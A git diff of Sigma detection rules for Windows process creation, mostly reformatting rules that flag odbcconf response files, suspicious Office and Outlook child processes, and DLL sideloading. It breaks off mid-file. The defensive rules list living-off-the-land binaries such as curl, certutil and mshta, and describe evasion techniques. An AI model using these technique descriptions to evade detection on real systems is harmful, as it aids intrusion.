a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_response_file.yml b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_response_file.yml index a292161d1..92119ba19 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_response_file.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_response_file.yml @@ -1,20 +1,18 @@ title: Response File Execution Via Odbcconf.EXE id: 5f03babb-12db-4eec-8c82-7b4cb5580868 related: - - id: 2d32dd6f-3196-4093-b9eb-1ad8ab088ca5 - type: similar - - id: 65d2be45-8600-4042-b4c0-577a1ff8a60e - type: obsoletes + - id: 2d32dd6f-3196-4093-b9eb-1ad8ab088ca5 + type: similar + - id: 65d2be45-8600-4042-b4c0-577a1ff8a60e + type: obsoletes status: experimental -description: Detects execution of "odbcconf" with the "-f" flag in order to load a - response file which might contain a malicious action. +description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action. references: - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16 - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ - https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control - https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/ -author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine - Bencherchali (Nextron Systems) +author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2023/05/22 tags: - attack.defense_evasion @@ -28,19 +26,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - Image|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -f ' - ' /f ' selection_rsp_ext: - CommandLine|contains: .rsp + CommandLine|contains: .rsp condition: process_creation and (all of selection_*) falsepositives: - - The rule is looking for any usage of response file, which might generate false - positive when this function is used legitimately. Investigate the contents - of the ".rsp" file to determine if it is malicious and apply additional filters - if necessary. + - The rule is looking for any usage of response file, which might generate false positive when this function is used legitimately. Investigate the contents of the ".rsp" file to determine if it is malicious and apply additional filters if necessary. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_response_file_susp.yml b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_response_file_susp.yml index e31d004c9..d703c5fe5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_response_file_susp.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_response_file_susp.yml @@ -1,13 +1,12 @@ title: Suspicious Response File Execution Via Odbcconf.EXE id: 2d32dd6f-3196-4093-b9eb-1ad8ab088ca5 related: - - id: 5f03babb-12db-4eec-8c82-7b4cb5580868 - type: derived - - id: 65d2be45-8600-4042-b4c0-577a1ff8a60e - type: obsoletes + - id: 5f03babb-12db-4eec-8c82-7b4cb5580868 + type: derived + - id: 65d2be45-8600-4042-b4c0-577a1ff8a60e + type: obsoletes status: experimental -description: Detects execution of "odbcconf" with the "-f" flag in order to load a - response file with a non-".rsp" extension. +description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension. references: - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16 - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ @@ -27,18 +26,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - Image|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -f ' - ' /f ' filter_main_rsp_ext: - CommandLine|contains: .rsp + CommandLine|contains: .rsp filter_main_runonce_odbc: + # When odbcconf is run with the "/R" flag, it creates a "runonce" key to run at the next reboot ParentImage: C:\Windows\System32\runonce.exe Image: C:\Windows\System32\odbcconf.exe - CommandLine|contains: .exe /E /F "C:\WINDOWS\system32\odbcconf.tmp" + CommandLine|contains: .exe /E /F "C:\WINDOWS\system32\odbcconf.tmp" condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_uncommon_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_uncommon_child_process.yml index fe1028934..be49e909e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_uncommon_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_uncommon_child_process.yml @@ -1,8 +1,7 @@ title: Uncommon Child Process Spawned By Odbcconf.EXE id: 8e3c7994-131e-4ba5-b6ea-804d49113a26 status: experimental -description: Detects an uncommon child process of "odbcconf.exe" binary which normally - shouldn't have any child processes. +description: Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes. references: - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16 - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ @@ -25,8 +24,6 @@ detection: condition: process_creation and selection falsepositives: - In rare occurrences where "odbcconf" crashes. It might spawn a "werfault" process - - Other child processes will depend on the DLL being registered by actions like - "regsvr". In case where the DLLs have external calls (which should be rare). - Other child processes might spawn and additional filters need to be applied. + - Other child processes will depend on the DLL being registered by actions like "regsvr". In case where the DLLs have external calls (which should be rare). Other child processes might spawn and additional filters need to be applied. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_office_arbitrary_cli_download.yml b/sigma/sysmon/process_creation/proc_creation_win_office_arbitrary_cli_download.yml index 92b02e292..7675918c9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_office_arbitrary_cli_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_office_arbitrary_cli_download.yml @@ -1,8 +1,8 @@ title: Potential Arbitrary File Download Using Office Application id: 4ae3e30b-b03f-43aa-87e3-b622f4048eed related: - - id: 0c79148b-118e-472b-bdb7-9b57b444cc19 - type: obsoletes + - id: 0c79148b-118e-472b-bdb7-9b57b444cc19 + type: obsoletes status: experimental description: Detects potential arbitrary file download using a Microsoft Office application references: @@ -25,16 +25,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \EXCEL.EXE - - \POWERPNT.EXE - - \WINWORD.exe - - OriginalFileName: - - Excel.exe - - POWERPNT.EXE - - WinWord.exe + - Image|endswith: + - \EXCEL.EXE + - \POWERPNT.EXE + - \WINWORD.exe + - OriginalFileName: + - Excel.exe + - POWERPNT.EXE + - WinWord.exe selection_http: - CommandLine|contains: + CommandLine|contains: - http:// - https:// condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml b/sigma/sysmon/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml index e9ead677b..8c638e724 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml @@ -1,10 +1,8 @@ title: Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp id: 551d9c1f-816c-445b-a7a6-7a3864720d60 status: experimental -description: 'Detects suspicious child processes of Excel which could be an indicator - of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object. - - ' +description: | + Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object. references: - https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922 - https://github.com/grayhatkiller/SharpExShell @@ -25,14 +23,14 @@ detection: selection_parent: ParentImage|endswith: \excel.exe selection_child: - - OriginalFileName: - - foxprow.exe - - schdplus.exe - - winproj.exe - - Image|endswith: - - \foxprow.exe - - \schdplus.exe - - \winproj.exe + - OriginalFileName: + - foxprow.exe + - schdplus.exe + - winproj.exe + - Image|endswith: + - \foxprow.exe + - \schdplus.exe + - \winproj.exe condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml b/sigma/sysmon/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml index ab38aa7d9..57ca5c2a7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml @@ -1,9 +1,7 @@ title: Potentially Suspicious Office Document Executed From Trusted Location id: f99abdf0-6283-4e71-bd2b-b5c048a94743 status: experimental -description: Detects the execution of an Office application that points to a document - that is located in a trusted location. Attackers often used this to avoid macro - security and execute their malicious code. +description: Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often used this to avoid macro security and execute their malicious code. references: - Internal Research - https://twitter.com/Max_Mal_/status/1633863678909874176 @@ -24,26 +22,29 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_parent: + # Note: we add a parent shell to reduce FP. Add additional 3rd party shells that you might use ParentImage|endswith: - \explorer.exe - \dopus.exe selection_img: - - Image|endswith: - - \EXCEL.EXE - - \POWERPNT.EXE - - \WINWORD.exe - - OriginalFileName: - - Excel.exe - - POWERPNT.EXE - - WinWord.exe + - Image|endswith: + - \EXCEL.EXE + - \POWERPNT.EXE + - \WINWORD.exe + - OriginalFileName: + - Excel.exe + - POWERPNT.EXE + - WinWord.exe selection_trusted_location: - CommandLine|contains: + CommandLine|contains: + # Note: these are the default locations. Admins/Users could add additional ones that you need to cover - \AppData\Roaming\Microsoft\Templates - \AppData\Roaming\Microsoft\Word\Startup\ - \Microsoft Office\root\Templates\ - \Microsoft Office\Templates\ filter_main_dotx: - CommandLine|endswith: + # Note: We add this filter to avoid curious people clicking on template files + CommandLine|endswith: - .dotx - .xltx - .potx diff --git a/sigma/sysmon/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml index cc871d3e1..28a0bff90 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml @@ -1,17 +1,14 @@ title: Suspicious Microsoft OneNote Child Process id: c27515df-97a9-4162-8a60-dc0eeb51b775 related: - - id: 438025f9-5856-4663-83f7-52f878a70a50 - type: derived + - id: 438025f9-5856-4663-83f7-52f878a70a50 # Generic rule for suspicious office application child processes + type: derived status: test -description: Detects suspicious child processes of the Microsoft OneNote application. - This may indicate an attempt to execute malicious embedded objects from a .one - file. +description: Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file. references: - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18 - https://micahbabinski.medium.com/detecting-onenote-one-malware-delivery-407e9321ecf0 -author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic - (idea) +author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea) date: 2022/10/21 modified: 2023/02/10 tags: @@ -29,79 +26,79 @@ detection: selection_parent: ParentImage|endswith: \onenote.exe selection_opt_img: - - OriginalFileName: - - bitsadmin.exe - - CertOC.exe - - CertUtil.exe - - Cmd.Exe - - CMSTP.EXE - - cscript.exe - - curl.exe - - HH.exe - - IEExec.exe - - InstallUtil.exe - - javaw.exe - - Microsoft.Workflow.Compiler.exe - - msdt.exe - - MSHTA.EXE - - msiexec.exe - - Msxsl.exe - - odbcconf.exe - - pcalua.exe - - PowerShell.EXE - - RegAsm.exe - - RegSvcs.exe - - REGSVR32.exe - - RUNDLL32.exe - - schtasks.exe - - ScriptRunner.exe - - wmic.exe - - WorkFolders.exe - - wscript.exe - - Image|endswith: - - \AppVLP.exe - - \bash.exe - - \bitsadmin.exe - - \certoc.exe - - \certutil.exe - - \cmd.exe - - \cmstp.exe - - \control.exe - - \cscript.exe - - \curl.exe - - \forfiles.exe - - \hh.exe - - \ieexec.exe - - \installutil.exe - - \javaw.exe - - \mftrace.exe - - \Microsoft.Workflow.Compiler.exe - - \msbuild.exe - - \msdt.exe - - \mshta.exe - - \msidb.exe - - \msiexec.exe - - \msxsl.exe - - \odbcconf.exe - - \pcalua.exe - - \powershell.exe - - \pwsh.exe - - \regasm.exe - - \regsvcs.exe - - \regsvr32.exe - - \rundll32.exe - - \schtasks.exe - - \scrcons.exe - - \scriptrunner.exe - - \sh.exe - - \svchost.exe - - \verclsid.exe - - \wmic.exe - - \workfolders.exe - - \wscript.exe + - OriginalFileName: + - bitsadmin.exe + - CertOC.exe + - CertUtil.exe + - Cmd.Exe + - CMSTP.EXE + - cscript.exe + - curl.exe + - HH.exe + - IEExec.exe + - InstallUtil.exe + - javaw.exe + - Microsoft.Workflow.Compiler.exe + - msdt.exe + - MSHTA.EXE + - msiexec.exe + - Msxsl.exe + - odbcconf.exe + - pcalua.exe + - PowerShell.EXE + - RegAsm.exe + - RegSvcs.exe + - REGSVR32.exe + - RUNDLL32.exe + - schtasks.exe + - ScriptRunner.exe + - wmic.exe + - WorkFolders.exe + - wscript.exe + - Image|endswith: + - \AppVLP.exe + - \bash.exe + - \bitsadmin.exe + - \certoc.exe + - \certutil.exe + - \cmd.exe + - \cmstp.exe + - \control.exe + - \cscript.exe + - \curl.exe + - \forfiles.exe + - \hh.exe + - \ieexec.exe + - \installutil.exe + - \javaw.exe + - \mftrace.exe + - \Microsoft.Workflow.Compiler.exe + - \msbuild.exe + - \msdt.exe + - \mshta.exe + - \msidb.exe + - \msiexec.exe + - \msxsl.exe + - \odbcconf.exe + - \pcalua.exe + - \powershell.exe + - \pwsh.exe + - \regasm.exe + - \regsvcs.exe + - \regsvr32.exe + - \rundll32.exe + - \schtasks.exe + - \scrcons.exe + - \scriptrunner.exe + - \sh.exe + - \svchost.exe + - \verclsid.exe + - \wmic.exe + - \workfolders.exe + - \wscript.exe selection_opt_explorer: Image|endswith: \explorer.exe - CommandLine|contains: + CommandLine|contains: - .hta - .vb - .wsh @@ -121,13 +118,12 @@ detection: - \Windows\System32\Tasks\ filter_teams: Image|endswith: \AppData\Local\Microsoft\Teams\current\Teams.exe - CommandLine|endswith: -Embedding + CommandLine|endswith: -Embedding filter_onedrive: Image|contains: \AppData\Local\Microsoft\OneDrive\ Image|endswith: \FileCoAuth.exe - CommandLine|endswith: -Embedding - condition: process_creation and (selection_parent and 1 of selection_opt_* and - not 1 of filter_*) + CommandLine|endswith: -Embedding + condition: process_creation and (selection_parent and 1 of selection_opt_* and not 1 of filter_*) falsepositives: - File located in the AppData folder with trusted signature level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml b/sigma/sysmon/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml index 71211abc7..e0286dc5f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml @@ -1,11 +1,10 @@ title: Outlook EnableUnsafeClientMailRules Setting Enabled id: 55f0a3a1-846e-40eb-8273-677371b8d912 related: - - id: 6763c6c8-bd01-4687-bc8d-4fa52cf8ba08 - type: similar + - id: 6763c6c8-bd01-4687-bc8d-4fa52cf8ba08 # Registry variation + type: similar status: test -description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" - which allows outlook to run applications or execute macros +description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros references: - https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44 @@ -26,7 +25,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: \Outlook\Security\EnableUnsafeClientMailRules + CommandLine|contains: \Outlook\Security\EnableUnsafeClientMailRules condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml index de696494e..3209d8bed 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml @@ -1,17 +1,16 @@ title: Suspicious Outlook Child Process id: 208748f7-881d-47ac-a29c-07ea84bf691d related: - - id: 438025f9-5856-4663-83f7-52f878a70a50 - type: derived - - id: e212d415-0e93-435f-9e1a-f29005bb4723 - type: derived + - id: 438025f9-5856-4663-83f7-52f878a70a50 # Office Child Processes + type: derived + - id: e212d415-0e93-435f-9e1a-f29005bb4723 # Outlook Remote Child Process + type: derived status: test description: Detects a suspicious process spawning from an Outlook process. references: - https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100 - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html -author: Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye - Team +author: Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team date: 2022/02/28 modified: 2023/02/04 tags: @@ -35,8 +34,8 @@ detection: - \forfiles.exe - \hh.exe - \mftrace.exe - - \msbuild.exe - - \msdt.exe + - \msbuild.exe # https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml + - \msdt.exe # CVE-2022-30190 - \mshta.exe - \msiexec.exe - \powershell.exe @@ -46,9 +45,22 @@ detection: - \scrcons.exe - \scriptrunner.exe - \sh.exe - - \svchost.exe - - \wmic.exe + - \svchost.exe # https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html + - \wmic.exe # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ - \wscript.exe + # Several FPs with rundll32.exe + # We started excluding specific use cases and ended up commenting out the rundll32.exe sub processes completely + # - '\rundll32.exe' + # filter_outlook_photoviewer: # https://twitter.com/Luke_Hamp/status/1495919717760237568 + # ParentImage|endswith: '\OUTLOOK.EXE' + # Image|endswith: '\rundll32.exe' + # CommandLine|contains: '\PhotoViewer.dll' + # filter_outlook_printattachments: # https://twitter.com/KickaKamil/status/1496238278659485696 + # ParentImage|endswith: '\OUTLOOK.EXE' + # Image|endswith: '\rundll32.exe' + # CommandLine|contains|all: + # - 'shell32.dll,Control_RunDLL' + # - '\SYSTEM32\SPOOL\DRIVERS\' condition: process_creation and selection fields: - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml b/sigma/sysmon/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml index 75b0e2f27..00efa0f78 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml @@ -1,11 +1,10 @@ title: Suspicious Remote Child Process From Outlook id: e212d415-0e93-435f-9e1a-f29005bb4723 related: - - id: 208748f7-881d-47ac-a29c-07ea84bf691d - type: similar + - id: 208748f7-881d-47ac-a29c-07ea84bf691d # Outlook Child Processes + type: similar status: test -description: Detects a suspicious child process spawning from Outlook where the image - is located in a remote location (SMB/WebDav shares). +description: Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares). references: - https://github.com/sensepost/ruler - https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html diff --git a/sigma/sysmon/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml b/sigma/sysmon/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml index 93179affe..37eea8f96 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml @@ -1,8 +1,7 @@ title: Suspicious Binary In User Directory Spawned From Office Application id: aa3a6f94-890e-4e22-b634-ffdfd54792cc status: test -description: Detects an executable in the users directory started from one of the - Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio) +description: Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio) references: - https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign - https://www.virustotal.com/gui/file/23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57 @@ -31,6 +30,7 @@ detection: - \VISIO.exe - \MSACCESS.exe - \EQNEDT32.exe + # - '\OUTLOOK.EXE' too many FPs Image|startswith: C:\users\ Image|endswith: .exe filter: diff --git a/sigma/sysmon/process_creation/proc_creation_win_office_susp_child_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_office_susp_child_processes.yml index 20d62d326..b4e5d38a4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_office_susp_child_processes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_office_susp_child_processes.yml @@ -1,19 +1,18 @@ title: Suspicious Microsoft Office Child Process id: 438025f9-5856-4663-83f7-52f878a70a50 related: - - id: c27515df-97a9-4162-8a60-dc0eeb51b775 - type: derived - - id: e1693bc8-7168-4eab-8718-cdcaa68a1738 - type: derived - - id: 23daeb52-e6eb-493c-8607-c4f0246cb7d8 - type: obsoletes - - id: 518643ba-7d9c-4fa5-9f37-baed36059f6a - type: obsoletes - - id: 04f5363a-6bca-42ff-be70-0d28bf629ead - type: obsoletes + - id: c27515df-97a9-4162-8a60-dc0eeb51b775 # Speicifc OneNote rule due to its recent usage in phishing attacks + type: derived + - id: e1693bc8-7168-4eab-8718-cdcaa68a1738 + type: derived + - id: 23daeb52-e6eb-493c-8607-c4f0246cb7d8 + type: obsoletes + - id: 518643ba-7d9c-4fa5-9f37-baed36059f6a + type: obsoletes + - id: 04f5363a-6bca-42ff-be70-0d28bf629ead + type: obsoletes status: test -description: Detects a suspicious process spawning from one of the Microsoft Office - suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.) +description: Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.) references: - https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100 - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html @@ -26,8 +25,7 @@ references: - https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml - https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html - https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ -author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, - Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io +author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io date: 2018/04/06 modified: 2023/04/24 tags: @@ -57,77 +55,77 @@ detection: - \wordpad.exe - \wordview.exe selection_child_processes: - - OriginalFileName: - - bitsadmin.exe - - CertOC.exe - - CertUtil.exe - - Cmd.Exe - - CMSTP.EXE - - cscript.exe - - curl.exe - - HH.exe - - IEExec.exe - - InstallUtil.exe - - javaw.exe - - Microsoft.Workflow.Compiler.exe - - msdt.exe - - MSHTA.EXE - - msiexec.exe - - Msxsl.exe - - odbcconf.exe - - pcalua.exe - - PowerShell.EXE - - RegAsm.exe - - RegSvcs.exe - - REGSVR32.exe - - RUNDLL32.exe - - schtasks.exe - - ScriptRunner.exe - - wmic.exe - - WorkFolders.exe - - wscript.exe - - Image|endswith: - - \AppVLP.exe - - \bash.exe - - \bitsadmin.exe - - \certoc.exe - - \certutil.exe - - \cmd.exe - - \cmstp.exe - - \control.exe - - \cscript.exe - - \curl.exe - - \forfiles.exe - - \hh.exe - - \ieexec.exe - - \installutil.exe - - \javaw.exe - - \mftrace.exe - - \Microsoft.Workflow.Compiler.exe - - \msbuild.exe - - \msdt.exe - - \mshta.exe - - \msidb.exe - - \msiexec.exe - - \msxsl.exe - - \odbcconf.exe - - \pcalua.exe - - \powershell.exe - - \pwsh.exe - - \regasm.exe - - \regsvcs.exe - - \regsvr32.exe - - \rundll32.exe - - \schtasks.exe - - \scrcons.exe - - \scriptrunner.exe - - \sh.exe - - \svchost.exe - - \verclsid.exe - - \wmic.exe - - \workfolders.exe - - \wscript.exe - selection_child_susp_paths: + - OriginalFileName: + - bitsadmin.exe + - CertOC.exe + - CertUtil.exe + - Cmd.Exe + - CMSTP.EXE + - cscript.exe + - curl.exe + - HH.exe + - IEExec.exe + - InstallUtil.exe + - javaw.exe + - Microsoft.Workflow.Compiler.exe + - msdt.exe + - MSHTA.EXE + - msiexec.exe + - Msxsl.exe + - odbcconf.exe + - pcalua.exe + - PowerShell.EXE + - RegAsm.exe + - RegSvcs.exe + - REGSVR32.exe + - RUNDLL32.exe + - schtasks.exe + - ScriptRunner.exe + - wmic.exe + - WorkFolders.exe + - wscript.exe + - Image|endswith: + - \AppVLP.exe + - \bash.exe + - \bitsadmin.exe + - \certoc.exe + - \certutil.exe + - \cmd.exe + - \cmstp.exe + - \control.exe + - \cscript.exe + - \curl.exe + - \forfiles.exe + - \hh.exe + - \ieexec.exe + - \installutil.exe + - \javaw.exe + - \mftrace.exe + - \Microsoft.Workflow.Compiler.exe + - \msbuild.exe + - \msdt.exe + - \mshta.exe + - \msidb.exe + - \msiexec.exe + - \msxsl.exe + - \odbcconf.exe + - \pcalua.exe + - \powershell.exe + - \pwsh.exe + - \regasm.exe + - \regsvcs.exe + - \regsvr32.exe + - \rundll32.exe + - \schtasks.exe + - \scrcons.exe + - \scriptrunner.exe + - \sh.exe + - \svchost.exe + - \verclsid.exe + - \wmic.exe + - \workfolders.exe + - \wscript.exe + selection_child_susp_paths: # Idea: Laiali Kazalbach, Mohamed Elsayed (#4142) Image|contains: - \AppData\ - \Users\Public\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_office_winword_dll_load.yml b/sigma/sysmon/process_creation/proc_creation_win_office_winword_dll_load.yml index 943e7bc94..20b00b840 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_office_winword_dll_load.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_office_winword_dll_load.yml @@ -1,11 +1,10 @@ title: Potential Arbitrary DLL Load Using Winword id: f7375e28-5c14-432f-b8d1-1db26c832df3 related: - - id: 2621b3a6-3840-4810-ac14-a02426086171 - type: obsoletes + - id: 2621b3a6-3840-4810-ac14-a02426086171 + type: obsoletes status: test -description: Detects potential DLL sideloading using the Microsoft Office winword - process via the '/l' flag. +description: Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag. references: - https://github.com/D4Vinci/One-Lin3r/blob/9fdfa5f0b9c698dfbd4cdfe7d2473192777ae1c6/one_lin3r/core/liners/windows/cmd/dll_loader_word.py author: Victor Sergeev, oscd.community @@ -23,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \WINWORD.exe - - OriginalFileName: WinWord.exe + - Image|endswith: \WINWORD.exe + - OriginalFileName: WinWord.exe selection_dll: - CommandLine|contains|all: + CommandLine|contains|all: - '/l ' - .dll condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_offlinescannershell_mpclient_sideloading.yml b/sigma/sysmon/process_creation/proc_creation_win_offlinescannershell_mpclient_sideloading.yml index 2a344c226..8ff359b48 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_offlinescannershell_mpclient_sideloading.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_offlinescannershell_mpclient_sideloading.yml @@ -1,13 +1,9 @@ title: Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution id: 02b18447-ea83-4b1b-8805-714a8a34546a status: test -description: 'Detects execution of Windows Defender "OfflineScannerShell.exe" from - its non standard directory. - - The "OfflineScannerShell.exe" binary is vulnerable to DLL side loading and will - load any DLL named "mpclient.dll" from the current working directory. - - ' +description: | + Detects execution of Windows Defender "OfflineScannerShell.exe" from its non standard directory. + The "OfflineScannerShell.exe" binary is vulnerable to DLL side loading and will load any DLL named "mpclient.dll" from the current working directory. references: - https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/ author: frack113 @@ -25,14 +21,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \OfflineScannerShell.exe - - OriginalFileName: OfflineScannerShell.exe + - Image|endswith: \OfflineScannerShell.exe + - OriginalFileName: OfflineScannerShell.exe filter_main_legit_dir: CurrentDirectory: C:\Program Files\Windows Defender\Offline\ filter_main_empty: CurrentDirectory: '' filter_main_null: - CurrentDirectory: null + CurrentDirectory: condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_pdqdeploy_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_pdqdeploy_execution.yml index a2df926be..7561c114b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pdqdeploy_execution.yml +++ 